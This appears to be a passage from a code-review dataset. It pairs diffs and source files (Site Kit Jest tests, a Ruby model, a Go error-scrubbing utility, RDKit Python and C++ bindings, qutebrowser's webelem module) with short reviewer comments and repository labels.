registry.dispatch( STORE_NAME ).receiveAllFeatureTours( [ testTourA, testTourB ] );
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [ testTourB.slug ] );
// Tour B was received as dismissed, but A was not.
expect(
await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'common-context' )
).toEqual( [ testTourA ] );
} );
it( 'returns an array of tours that use their own logic for checking additional requirements', async () => {
// Check A will resolve with `true` on the next tick.
const checkA = jest.fn(
async () => new Promise( ( resolve ) => setTimeout( resolve( true ) ) )
);
// Check B will resolve with `false` on the next tick.
const checkB = jest.fn(
async () => new Promise( ( resolve ) => setTimeout( resolve( false ) ) )
);
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( [
{ ...testTourA, checkRequirements: checkA },
{ ...testTourB, checkRequirements: checkB },
] );
const viewTours = await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'common-context' );
expect( viewTours.map( ( { slug } ) => slug ) ).toEqual( [ testTourA.slug ] );
// Check functions should be called with the registry as the first parameter.
const registryMatcher = expect.objectContaining( {
select: expect.any( Function ),
dispatch: expect.any( Function ),
} );
// The registry instance passed to the function is slightly different for some reason
// so we can't simply call `.toHaveBeenCalledWith( registry )`
expect( checkA ).toHaveBeenCalledWith( registryMatcher );
expect( checkB ).toHaveBeenCalledWith( registryMatcher );
} );
} );
describe( 'getAllFeatureTours', () => {
it( 'returns all tours in the store', () => {
const tours = [ testTourA, testTourB ];
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( tours );
expect(
registry.select( STORE_NAME ).getAllFeatureTours()
).toEqual( tours );
} );
} );
describe( 'isTourDismissed', () => {
it( 'returns `true` if the given slug is in the current list of dismissed tours', () => {
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [] );
expect( registry.select( STORE_NAME ).isTourDismissed( 'feature-x' ) ).toBe( false );
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [ 'feature-x', 'tour-y' ] );
expect( registry.select( STORE_NAME ).isTourDismissed( 'feature-x' ) ).toBe( true );
} );
it( 'will trigger the resolver for getDismissedFeatureTourSlugs and fetch if necessary', () => {
muteFetch( fetchGetDismissedToursRegExp );
registry.select( STORE_NAME ).isTourDismissed( 'feature-x' );
expect( fetchMock ).toHaveFetched( fetchGetDismissedToursRegExp );
} );
it( 'returns `undefined` if dismissed tours are not resolved yet', () => {
// The request will respond that `feature-x` _is dismissed_
				// but the selector will return `undefined` until the response is received.
fetchMock.getOnce( fetchGetDismissedToursRegExp, { body: [ 'feature-x' ] } );
expect( registry.select( STORE_NAME ).isTourDismissed( 'feature-x' ) ).toBeUndefined();
} );
} );
describe( 'getLastDismissedAt', () => {
// Note: storage is cleared before every test in the global config.
it( 'returns initial state (undefined) if there is no lastDismissedAt timestamp', () => {
const lastDismissedAt = registry.select( STORE_NAME ).getLastDismissedAt();
expect( lastDismissedAt ).toEqual( undefined );
} );
it( 'returns the lastDismissedAt timestamp if there is one', () => {
const timestamp = Date.now();
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( timestamp );
expect( registry.select( STORE_NAME ).getLastDismissedAt() ).toEqual( timestamp );
} );
it( 'uses a resolver to set lastDismissedAt in the store if there is a value in the cache', async () => {
const timestamp = Date.now();
await setItem( FEATURE_TOUR_LAST_DISMISSED_AT, timestamp );
registry.select( STORE_NAME ).getLastDismissedAt();
await untilResolved( registry, STORE_NAME ).getLastDismissedAt();
expect( registry.select( STORE_NAME ).getLastDismissedAt() ).toBe( timestamp );
} );
			it( 'returns null for an expired lastDismissedAt value in the cache', async () => {
const timestamp = Date.now();
// Set an item that is guaranteed to be expired when called with `getItem`
await setItem( FEATURE_TOUR_LAST_DISMISSED_AT, timestamp, { ttl: -1 } );
registry.select( STORE_NAME ).getLastDismissedAt();
await untilResolved( registry, STORE_NAME ).getLastDismissedAt();
expect( registry.select( STORE_NAME ).getLastDismissedAt() ).toBe( null );
} );
} );
describe( 'areFeatureToursOnCooldown', () => {
it( 'returns undefined if there is no lastDismissedAt timestamp', () => {
expect( registry.select( STORE_NAME ).areFeatureToursOnCooldown() ).toBeUndefined();
} );
it( 'returns true if the lastDismissedAt timestamp is within the feature tour cooldown period', () => {
const timestamp = Date.now();
const coolDownPeriodMilliseconds = FEATURE_TOUR_COOLDOWN_SECONDS * 1000;
const justInsideCoolDownPeriod = timestamp + coolDownPeriodMilliseconds - 1000;
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( justInsideCoolDownPeriod );
expect( registry.select( STORE_NAME ).areFeatureToursOnCooldown() ).toEqual( true );
} );
it( 'returns false if the feature tour cooldown period has expired', () => {
const coolDownPeriodMilliseconds = FEATURE_TOUR_COOLDOWN_SECONDS * 1000;
const startOfCoolDownPeriod = Date.now() - coolDownPeriodMilliseconds;
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( startOfCoolDownPeriod );
expect( registry.select( STORE_NAME ).areFeatureToursOnCooldown() ).toEqual( false );
} );
it( 'returns false for an expired lastDismissedAt value in the cache', async () => {
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( null );
expect( registry.select( STORE_NAME ).areFeatureToursOnCooldown() ).toEqual( false );
} );
} );
} );
} );
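
// Editor's note: a hypothetical helper, not part of the original test file, restating the
// cooldown rule exercised by the `areFeatureToursOnCooldown` tests above: dismissing a tour
// starts a window of FEATURE_TOUR_COOLDOWN_SECONDS during which no further tours are shown.
// eslint-disable-next-line no-unused-vars
function isOnCooldown( lastDismissedAt ) {
	if ( ! lastDismissedAt ) {
		return false;
	}
	// Still cooling down if the dismissal happened less than the cooldown period ago.
	return Date.now() - lastDismissedAt < FEATURE_TOUR_COOLDOWN_SECONDS * 1000;
}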
| 1 | 40,127 | I'm surprised this worked at all! It was importing the default export but `eslint-plugin-import` warned me `warning Using exported name 'initialState' as identifier for default export import/no-named-as-default` | google-site-kit-wp | js |
@@ -1,10 +1,9 @@
class VideoTutorial < Product
- has_many :teachers, dependent: :destroy
- has_many :users, through: :teachers
+ validates :description, :tagline, presence: true
- # Validations
- validates :description, presence: true
- validates :tagline, presence: true
+ def teachers
+ Teacher.joins(:video).merge(videos)
+ end
def collection?
published_videos.count > 1 | 1 | class VideoTutorial < Product
has_many :teachers, dependent: :destroy
has_many :users, through: :teachers
# Validations
validates :description, presence: true
validates :tagline, presence: true
def collection?
published_videos.count > 1
end
def included_in_plan?(plan)
plan.has_feature?(:video_tutorials)
end
end
| 1 | 13,563 | This was used in `app/views/video_tutorials/_video_tutorial_details.html.erb` how are we handling that now? | thoughtbot-upcase | rb |
@@ -8,8 +8,9 @@ var (
newlineTabRE = regexp.MustCompile(`\n\t`)
certificateTimeErrorRE = regexp.MustCompile(`: current time \S+ is after \S+`)
// aws
- awsRequestIDRE = regexp.MustCompile(`(, )*(?i)(request id: )(?:[-[:xdigit:]]+)`)
- awsNotAuthorized = regexp.MustCompile(`(User: arn:aws:sts::)\S+(:assumed-role/[^/]+/)\S+( is not authorized to perform: \S+ on resource: arn:aws:iam::)[^:]+(:\S+)`)
+ awsRequestIDRE = regexp.MustCompile(`(, )*(?i)(request id: )(?:[-[:xdigit:]]+)`)
+ awsNotAuthorized = regexp.MustCompile(`(User: arn:aws:sts::)\S+(:assumed-role/[^/]+/)\S+( is not authorized to perform: \S+ on resource: arn:aws:iam::)[^:]+(:\S+)`)
+ awsEncodedMessage = regexp.MustCompile(`(Encoded authorization failure message: )\S+(,)`)
// azure
azureErrorDescriptionRE = regexp.MustCompile(`\"error_description\":\"(.*?)\\r\\n`)
) | 1 | package utils
import (
"regexp"
)
var (
newlineTabRE = regexp.MustCompile(`\n\t`)
certificateTimeErrorRE = regexp.MustCompile(`: current time \S+ is after \S+`)
// aws
awsRequestIDRE = regexp.MustCompile(`(, )*(?i)(request id: )(?:[-[:xdigit:]]+)`)
awsNotAuthorized = regexp.MustCompile(`(User: arn:aws:sts::)\S+(:assumed-role/[^/]+/)\S+( is not authorized to perform: \S+ on resource: arn:aws:iam::)[^:]+(:\S+)`)
// azure
azureErrorDescriptionRE = regexp.MustCompile(`\"error_description\":\"(.*?)\\r\\n`)
)
// ErrorScrub scrubs cloud error messages destined for CRD status to remove things that
// change every attempt, such as request IDs, which subsequently cause an infinite update/reconcile loop.
func ErrorScrub(err error) string {
if err == nil {
return ""
}
s := newlineTabRE.ReplaceAllString(err.Error(), ", ")
s = awsRequestIDRE.ReplaceAllString(s, "")
s = awsNotAuthorized.ReplaceAllString(s, `${1}XXX${2}XXX${3}XXX${4}`)
s = certificateTimeErrorRE.ReplaceAllString(s, "")
// if Azure error, return just the error description
match := azureErrorDescriptionRE.FindStringSubmatch(s)
if len(match) > 0 {
return match[1]
}
return s
}
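
// Editor's note: an illustrative sketch, not part of the original file. Because ErrorScrub
// strips request IDs and other per-attempt noise, repeated failures of the same kind scrub to
// the same string, so a controller can compare scrubbed messages to avoid status churn.
func shouldUpdateConditionMessage(existingMessage string, err error) bool {
	// Only write status when the scrubbed message actually changed, preventing an
	// update/reconcile hot loop on errors that differ only by request ID or similar.
	return ErrorScrub(err) != existingMessage
}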
| 1 | 19,390 | Is `\S+` really the right thing? Anybody know what kind of encoding this is? Perhaps if we know it doesn't have commas, we can just use `[^,]+`. Also, parens around the comma are unnecessary, since we're not using the capture group. | openshift-hive | go |
@@ -1,10 +1,8 @@
tests = [
+ ("python", "UnitTestDocTests.py", {}),
("python", "UnitTestcBitVect.py", {}),
("python", "UnitTestBitEnsemble.py", {}),
("python", "UnitTestTopNContainer.py", {}),
- ("python", "BitUtils.py", {}),
- ("python", "VectCollection.py", {}),
- ("python", "LazySignature.py", {}),
]
longTests = []
| 1 | tests = [
("python", "UnitTestcBitVect.py", {}),
("python", "UnitTestBitEnsemble.py", {}),
("python", "UnitTestTopNContainer.py", {}),
("python", "BitUtils.py", {}),
("python", "VectCollection.py", {}),
("python", "LazySignature.py", {}),
]
longTests = []
if __name__ == '__main__':
import sys
from rdkit import TestRunner
failed, tests = TestRunner.RunScript('test_list.py', 0, 1)
sys.exit(len(failed))
| 1 | 16,217 | This block of changes looks like you removed tests without replacing them anywhere. Did I miss something? | rdkit-rdkit | cpp |
@@ -360,7 +360,10 @@ struct atom_wrapper {
.def("GetPropNames", &Atom::getPropList, (python::arg("self")),
"Returns a list of the properties set on the Atom.\n\n")
- .def("GetPropsAsDict", GetPropsAsDict<Atom>, (python::arg("self")),
+ .def("GetPropsAsDict", GetPropsAsDict<Atom>, (python::arg("self"),
+ python::arg("includePrivate") = true,
+ python::arg("includeComputed") = true
+ ),
"Returns a dictionary of the properties set on the Atom.\n"
" n.b. some properties cannot be converted to python types.\n")
| 1 | // $Id$
//
// Copyright (C) 2003-2013 Greg Landrum and Rational Discovery LLC
//
// @@ All Rights Reserved @@
// This file is part of the RDKit.
// The contents are covered by the terms of the BSD license
// which is included in the file license.txt, found at the root
// of the RDKit source tree.
//
#define NO_IMPORT_ARRAY
#include <RDBoost/python.h>
#include <string>
#include <GraphMol/RDKitBase.h>
#include <GraphMol/QueryAtom.h>
#include <GraphMol/MonomerInfo.h>
#include <RDGeneral/types.h>
#include <Geometry/point.h>
#include <GraphMol/SmilesParse/SmilesWrite.h>
#include <GraphMol/SmilesParse/SmartsWrite.h>
#include <RDBoost/Wrap.h>
#include "seqs.hpp"
#include "props.hpp"
#include <algorithm>
namespace python = boost::python;
namespace RDKit {
namespace {
std::string qhelper(Atom::QUERYATOM_QUERY *q, unsigned int depth) {
std::string res = "";
if (q) {
for (unsigned int i = 0; i < depth; ++i) res += " ";
res += q->getFullDescription() + "\n";
for (Atom::QUERYATOM_QUERY::CHILD_VECT_CI ci = q->beginChildren();
ci != q->endChildren(); ++ci) {
res += qhelper((*ci).get(), depth + 1);
}
}
return res;
}
} // end of local namespace
std::string describeQuery(const Atom *atom) {
std::string res = "";
if (atom->hasQuery()) {
res = qhelper(atom->getQuery(), 0);
}
return res;
}
void expandQuery(QueryAtom *self, const QueryAtom *other,
Queries::CompositeQueryType how, bool maintainOrder) {
if (other->hasQuery()) {
const QueryAtom::QUERYATOM_QUERY *qry = other->getQuery();
self->expandQuery(qry->copy(), how, maintainOrder);
}
}
template <class T>
void AtomSetProp(const Atom *atom, const char *key, const T &val) {
// std::cerr<<"asp: "<<atom<<" " << key<<" - " << val << std::endl;
atom->setProp<T>(key, val);
}
int AtomHasProp(const Atom *atom, const char *key) {
// std::cerr<<"ahp: "<<atom<<" " << key<< std::endl;
int res = atom->hasProp(key);
return res;
}
void AtomClearProp(const Atom *atom, const char *key) {
if (!atom->hasProp(key)) {
return;
}
atom->clearProp(key);
}
python::tuple AtomGetNeighbors(Atom *atom) {
python::list res;
const ROMol *parent = &atom->getOwningMol();
ROMol::ADJ_ITER begin, end;
boost::tie(begin, end) = parent->getAtomNeighbors(atom);
while (begin != end) {
res.append(python::ptr(parent->getAtomWithIdx(*begin)));
begin++;
}
return python::tuple(res);
}
python::tuple AtomGetBonds(Atom *atom) {
python::list res;
const ROMol *parent = &atom->getOwningMol();
ROMol::OEDGE_ITER begin, end;
boost::tie(begin, end) = parent->getAtomBonds(atom);
while (begin != end) {
Bond *tmpB = (*parent)[*begin].get();
res.append(python::ptr(tmpB));
begin++;
}
return python::tuple(res);
}
bool AtomIsInRing(const Atom *atom) {
if (!atom->getOwningMol().getRingInfo()->isInitialized()) {
MolOps::findSSSR(atom->getOwningMol());
}
return atom->getOwningMol().getRingInfo()->numAtomRings(atom->getIdx()) != 0;
}
bool AtomIsInRingSize(const Atom *atom, int size) {
if (!atom->getOwningMol().getRingInfo()->isInitialized()) {
MolOps::findSSSR(atom->getOwningMol());
}
return atom->getOwningMol().getRingInfo()->isAtomInRingOfSize(atom->getIdx(),
size);
}
std::string AtomGetSmarts(const Atom *atom) {
std::string res;
if (atom->hasQuery()) {
res = SmartsWrite::GetAtomSmarts(static_cast<const QueryAtom *>(atom));
} else {
res = SmilesWrite::GetAtomSmiles(atom);
}
return res;
}
void SetAtomMonomerInfo(Atom *atom, const AtomMonomerInfo *info) {
atom->setMonomerInfo(info->copy());
}
AtomMonomerInfo *AtomGetMonomerInfo(Atom *atom) {
return atom->getMonomerInfo();
}
AtomPDBResidueInfo *AtomGetPDBResidueInfo(Atom *atom) {
AtomMonomerInfo *res = atom->getMonomerInfo();
if (!res) return NULL;
if (res->getMonomerType() != AtomMonomerInfo::PDBRESIDUE) {
throw_value_error("MonomerInfo is not a PDB Residue");
}
return (AtomPDBResidueInfo *)res;
}
// FIX: is there any reason at all to not just prevent the construction of
// Atoms?
std::string atomClassDoc =
"The class to store Atoms.\n\
Note that, though it is possible to create one, having an Atom on its own\n\
    (i.e., not associated with a molecule) is not particularly useful.\n";
struct atom_wrapper {
static void wrap() {
python::class_<Atom>("Atom", atomClassDoc.c_str(),
python::init<std::string>())
.def(python::init<unsigned int>(
"Constructor, takes either an int (atomic number) or a string "
"(atomic symbol).\n"))
.def("GetAtomicNum", &Atom::getAtomicNum, "Returns the atomic number.")
.def("SetAtomicNum", &Atom::setAtomicNum,
"Sets the atomic number, takes an integer value as an argument")
.def("GetSymbol", &Atom::getSymbol,
"Returns the atomic symbol (a string)\n")
.def("GetIdx", &Atom::getIdx,
"Returns the atom's index (ordering in the molecule)\n")
.def("GetDegree", &Atom::getDegree,
"Returns the degree of the atom in the molecule.\n\n"
" The degree of an atom is defined to be its number of\n"
" directly-bonded neighbors.\n"
" The degree is independent of bond orders, but is dependent\n"
" on whether or not Hs are explicit in the graph.\n")
.def("GetTotalDegree", &Atom::getTotalDegree,
"Returns the degree of the atom in the molecule including Hs.\n\n"
" The degree of an atom is defined to be its number of\n"
" directly-bonded neighbors.\n"
" The degree is independent of bond orders.\n")
.def("GetTotalNumHs", &Atom::getTotalNumHs,
(python::arg("self"), python::arg("includeNeighbors") = false),
"Returns the total number of Hs (explicit and implicit) on the "
"atom.\n\n"
" ARGUMENTS:\n\n"
" - includeNeighbors: (optional) toggles inclusion of "
"neighboring H atoms in the sum.\n"
" Defaults to 0.\n")
.def("GetNumImplicitHs", &Atom::getNumImplicitHs,
"Returns the total number of implicit Hs on the atom.\n")
.def("GetExplicitValence", &Atom::getExplicitValence,
"Returns the number of explicit Hs on the atom.\n")
.def("GetImplicitValence", &Atom::getImplicitValence,
"Returns the number of implicit Hs on the atom.\n")
.def("GetTotalValence", &Atom::getTotalValence,
"Returns the total valence (explicit + implicit) of the atom.\n\n")
.def("GetFormalCharge", &Atom::getFormalCharge)
.def("SetFormalCharge", &Atom::setFormalCharge)
.def("SetNoImplicit", &Atom::setNoImplicit,
"Sets a marker on the atom that *disallows* implicit Hs.\n"
" This holds even if the atom would otherwise have implicit Hs "
"added.\n")
.def("GetNoImplicit", &Atom::getNoImplicit,
"Returns whether or not the atom is *allowed* to have implicit "
"Hs.\n")
.def("SetNumExplicitHs", &Atom::setNumExplicitHs)
.def("GetNumExplicitHs", &Atom::getNumExplicitHs)
.def("SetIsAromatic", &Atom::setIsAromatic)
.def("GetIsAromatic", &Atom::getIsAromatic)
.def("GetMass", &Atom::getMass)
.def("SetIsotope", &Atom::setIsotope)
.def("GetIsotope", &Atom::getIsotope)
.def("SetNumRadicalElectrons", &Atom::setNumRadicalElectrons)
.def("GetNumRadicalElectrons", &Atom::getNumRadicalElectrons)
.def("SetChiralTag", &Atom::setChiralTag)
.def("InvertChirality", &Atom::invertChirality)
.def("GetChiralTag", &Atom::getChiralTag)
.def("SetHybridization", &Atom::setHybridization,
"Sets the hybridization of the atom.\n"
" The argument should be a HybridizationType\n")
.def("GetHybridization", &Atom::getHybridization,
"Returns the atom's hybridization.\n")
.def("GetOwningMol", &Atom::getOwningMol,
"Returns the Mol that owns this atom.\n",
python::return_value_policy<python::reference_existing_object>())
.def("GetNeighbors", AtomGetNeighbors,
"Returns a read-only sequence of the atom's neighbors\n")
.def("GetBonds", AtomGetBonds,
"Returns a read-only sequence of the atom's bonds\n")
.def("Match", (bool (Atom::*)(const Atom *) const) & Atom::Match,
"Returns whether or not this atom matches another Atom.\n\n"
" Each Atom (or query Atom) has a query function which is\n"
" used for this type of matching.\n\n"
" ARGUMENTS:\n"
" - other: the other Atom to which to compare\n")
.def("IsInRingSize", AtomIsInRingSize,
"Returns whether or not the atom is in a ring of a particular "
"size.\n\n"
" ARGUMENTS:\n"
" - size: the ring size to look for\n")
.def("IsInRing", AtomIsInRing,
"Returns whether or not the atom is in a ring\n\n")
.def("HasQuery", &Atom::hasQuery,
"Returns whether or not the atom has an associated query\n\n")
.def("DescribeQuery", describeQuery,
"returns a text description of the query. Primarily intended for "
"debugging purposes.\n\n")
.def("GetSmarts", AtomGetSmarts,
"returns the SMARTS (or SMILES) string for an Atom\n\n")
// properties
.def("SetProp", AtomSetProp<std::string>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (a string).\n"
" - value: the property value (a string).\n\n")
.def("GetProp", GetProp<Atom, std::string>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (a string).\n\n"
" RETURNS: a string\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("SetIntProp", AtomSetProp<int>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (a int).\n"
" - value: the property value (a int).\n\n")
.def("SetUnsignedProp", AtomSetProp<unsigned>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (an unsigned integer).\n"
" - value: the property value (a int >= 0).\n\n")
.def("GetIntProp", GetProp<Atom, int>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (an int).\n\n"
" RETURNS: an int\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("GetUnsignedProp", GetProp<Atom, unsigned>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (an unsigned integer).\n\n"
" RETURNS: an integer (Python has no unsigned type)\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("SetDoubleProp", AtomSetProp<double>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (a double).\n"
" - value: the property value (a double).\n\n")
.def("GetDoubleProp", GetProp<Atom, double>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (a double).\n\n"
" RETURNS: a double\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("SetBoolProp", AtomSetProp<bool>,
(python::arg("self"), python::arg("key"), python::arg("val")),
"Sets an atomic property\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be set (a bool).\n"
" - value: the property value (a bool).\n\n")
.def("GetBoolProp", GetProp<Atom, bool>,
"Returns the value of the property.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to return (a bool).\n\n"
" RETURNS: a bool\n\n"
" NOTE:\n"
" - If the property has not been set, a KeyError exception "
"will be raised.\n")
.def("HasProp", AtomHasProp,
"Queries a Atom to see if a particular property has been "
"assigned.\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to check for (a string).\n")
.def("ClearProp", AtomClearProp,
"Removes a particular property from an Atom (does nothing if not "
"already set).\n\n"
" ARGUMENTS:\n"
" - key: the name of the property to be removed.\n")
.def("GetPropNames", &Atom::getPropList, (python::arg("self")),
"Returns a list of the properties set on the Atom.\n\n")
.def("GetPropsAsDict", GetPropsAsDict<Atom>, (python::arg("self")),
"Returns a dictionary of the properties set on the Atom.\n"
" n.b. some properties cannot be converted to python types.\n")
.def("UpdatePropertyCache", &Atom::updatePropertyCache,
(python::arg("self"), python::arg("strict") = true),
"Regenerates computed properties like implicit valence and ring "
"information.\n\n")
.def("NeedsUpdatePropertyCache", &Atom::needsUpdatePropertyCache,
(python::arg("self")),
"Returns true or false depending on whether implicit and explicit "
"valence of the molecule have already been calculated.\n\n")
.def("GetMonomerInfo", AtomGetMonomerInfo,
python::return_internal_reference<
1, python::with_custodian_and_ward_postcall<0, 1> >(),
"Returns the atom's MonomerInfo object, if there is one.\n\n")
.def("GetPDBResidueInfo", AtomGetPDBResidueInfo,
python::return_internal_reference<
1, python::with_custodian_and_ward_postcall<0, 1> >(),
"Returns the atom's MonomerInfo object, if there is one.\n\n")
.def("SetMonomerInfo", SetAtomMonomerInfo,
"Sets the atom's MonomerInfo object.\n\n");
python::enum_<Atom::HybridizationType>("HybridizationType")
.value("UNSPECIFIED", Atom::UNSPECIFIED)
.value("SP", Atom::SP)
.value("SP2", Atom::SP2)
.value("SP3", Atom::SP3)
.value("SP3D", Atom::SP3D)
.value("SP3D2", Atom::SP3D2)
.value("OTHER", Atom::OTHER);
python::enum_<Atom::ChiralType>("ChiralType")
.value("CHI_UNSPECIFIED", Atom::CHI_UNSPECIFIED)
.value("CHI_TETRAHEDRAL_CW", Atom::CHI_TETRAHEDRAL_CW)
.value("CHI_TETRAHEDRAL_CCW", Atom::CHI_TETRAHEDRAL_CCW)
.value("CHI_OTHER", Atom::CHI_OTHER)
        .export_values();
python::enum_<Queries::CompositeQueryType>("CompositeQueryType")
.value("COMPOSITE_AND", Queries::COMPOSITE_AND)
.value("COMPOSITE_OR", Queries::COMPOSITE_OR)
.value("COMPOSITE_XOR", Queries::COMPOSITE_XOR)
        .export_values();
atomClassDoc =
"The class to store QueryAtoms.\n\
These cannot currently be constructed directly from Python\n";
python::class_<QueryAtom, python::bases<Atom> >(
"QueryAtom", atomClassDoc.c_str(), python::no_init)
.def("ExpandQuery", expandQuery,
(python::arg("self"), python::arg("other"),
python::arg("how") = Queries::COMPOSITE_AND,
python::arg("maintainOrder") = true),
"combines the query from other with ours");
};
};
} // end of namespace
void wrap_atom() { RDKit::atom_wrapper::wrap(); }
| 1 | 15,048 | n.b. private and computed values are now exposed to the API. They were hidden/not exposed before. | rdkit-rdkit | cpp |
@@ -285,6 +285,13 @@ class WebElementWrapper(collections.abc.MutableMapping):
tag = self._elem.tagName().lower()
return self.get('role', None) in roles or tag in ('input', 'textarea')
+ def remove_target(self):
+ """Remove target from link"""
+ if self._elem.tagName().lower() == 'a':
+ self._elem.removeAttribute('target')
+ elif self.parent().tagName().lower() == 'a':
+ self.parent().removeAttribute('target')
+
def debug_text(self):
"""Get a text based on an element suitable for debug output."""
self._check_vanished() | 1 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2016 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Utilities related to QWebElements.
Module attributes:
Group: Enum for different kinds of groups.
SELECTORS: CSS selectors for different groups of elements.
FILTERS: A dictionary of filter functions for the modes.
The filter for "links" filters javascript:-links and a-tags
without "href".
"""
import collections.abc
import functools
from PyQt5.QtCore import QRect, QUrl
from PyQt5.QtWebKit import QWebElement
from qutebrowser.config import config
from qutebrowser.utils import log, usertypes, utils
Group = usertypes.enum('Group', ['all', 'links', 'images', 'url', 'prevnext',
'focus'])
SELECTORS = {
Group.all: ('a, area, textarea, select, input:not([type=hidden]), button, '
'frame, iframe, link, [onclick], [onmousedown], [role=link], '
'[role=option], [role=button], img'),
Group.links: 'a, area, link, [role=link]',
Group.images: 'img',
Group.url: '[src], [href]',
Group.prevnext: 'a, area, button, link, [role=button]',
Group.focus: '*:focus',
}
def filter_links(elem):
return 'href' in elem and QUrl(elem['href']).scheme() != 'javascript'
FILTERS = {
Group.links: filter_links,
Group.prevnext: filter_links,
}
class IsNullError(Exception):
"""Gets raised by WebElementWrapper if an element is null."""
pass
class WebElementWrapper(collections.abc.MutableMapping):
"""A wrapper around QWebElement to make it more intelligent."""
def __init__(self, elem):
if isinstance(elem, self.__class__):
raise TypeError("Trying to wrap a wrapper!")
if elem.isNull():
raise IsNullError('{} is a null element!'.format(elem))
self._elem = elem
for name in ('addClass', 'appendInside', 'appendOutside',
'attributeNS', 'classes', 'clone', 'document',
'encloseContentsWith', 'encloseWith',
'evaluateJavaScript', 'findAll', 'findFirst',
'firstChild', 'geometry', 'hasAttributeNS',
'hasAttributes', 'hasClass', 'hasFocus', 'lastChild',
'localName', 'namespaceUri', 'nextSibling', 'parent',
'prefix', 'prependInside', 'prependOutside',
'previousSibling', 'removeAllChildren',
'removeAttributeNS', 'removeClass', 'removeFromDocument',
'render', 'replace', 'setAttributeNS', 'setFocus',
'setInnerXml', 'setOuterXml', 'setPlainText',
'setStyleProperty', 'styleProperty', 'tagName',
'takeFromDocument', 'toInnerXml', 'toOuterXml',
'toggleClass', 'webFrame', '__eq__', '__ne__'):
# We don't wrap some methods for which we have better alternatives:
# - Mapping access for attributeNames/hasAttribute/setAttribute/
# attribute/removeAttribute.
# - isNull is checked automagically.
# - str(...) instead of toPlainText
# For the rest, we create a wrapper which checks if the element is
# null.
method = getattr(self._elem, name)
def _wrapper(meth, *args, **kwargs):
self._check_vanished()
return meth(*args, **kwargs)
wrapper = functools.partial(_wrapper, method)
# We used to do functools.update_wrapper here, but for some reason
# when using hints with many links, this accounted for nearly 50%
# of the time when profiling, which is unacceptable.
setattr(self, name, wrapper)
def __str__(self):
self._check_vanished()
return self._elem.toPlainText()
def __repr__(self):
try:
html = self.debug_text()
except IsNullError:
html = None
return utils.get_repr(self, html=html)
def __getitem__(self, key):
self._check_vanished()
if key not in self:
raise KeyError(key)
return self._elem.attribute(key)
def __setitem__(self, key, val):
self._check_vanished()
self._elem.setAttribute(key, val)
def __delitem__(self, key):
self._check_vanished()
if key not in self:
raise KeyError(key)
self._elem.removeAttribute(key)
def __contains__(self, key):
self._check_vanished()
return self._elem.hasAttribute(key)
def __iter__(self):
self._check_vanished()
yield from self._elem.attributeNames()
def __len__(self):
self._check_vanished()
return len(self._elem.attributeNames())
def _check_vanished(self):
"""Raise an exception if the element vanished (is null)."""
if self._elem.isNull():
raise IsNullError('Element {} vanished!'.format(
self._elem))
def is_visible(self, mainframe):
"""Check whether the element is currently visible on the screen.
Args:
mainframe: The main QWebFrame.
Return:
True if the element is visible, False otherwise.
"""
return is_visible(self._elem, mainframe)
def rect_on_view(self):
"""Get the geometry of the element relative to the webview."""
return rect_on_view(self._elem)
def is_writable(self):
"""Check whether an element is writable."""
self._check_vanished()
return not ('disabled' in self or 'readonly' in self)
def is_content_editable(self):
"""Check if an element has a contenteditable attribute.
Args:
elem: The QWebElement to check.
Return:
True if the element has a contenteditable attribute,
False otherwise.
"""
self._check_vanished()
try:
return self['contenteditable'].lower() not in ('false', 'inherit')
except KeyError:
return False
def _is_editable_object(self):
"""Check if an object-element is editable."""
if 'type' not in self:
log.webview.debug("<object> without type clicked...")
return False
objtype = self['type'].lower()
if objtype.startswith('application/') or 'classid' in self:
# Let's hope flash/java stuff has an application/* mimetype OR
# at least a classid attribute. Oh, and let's hope images/...
# DON'T have a classid attribute. HTML sucks.
log.webview.debug("<object type='{}'> clicked.".format(objtype))
return config.get('input', 'insert-mode-on-plugins')
else:
# Image/Audio/...
return False
def _is_editable_input(self):
"""Check if an input-element is editable.
Return:
True if the element is editable, False otherwise.
"""
try:
objtype = self['type'].lower()
except KeyError:
return self.is_writable()
else:
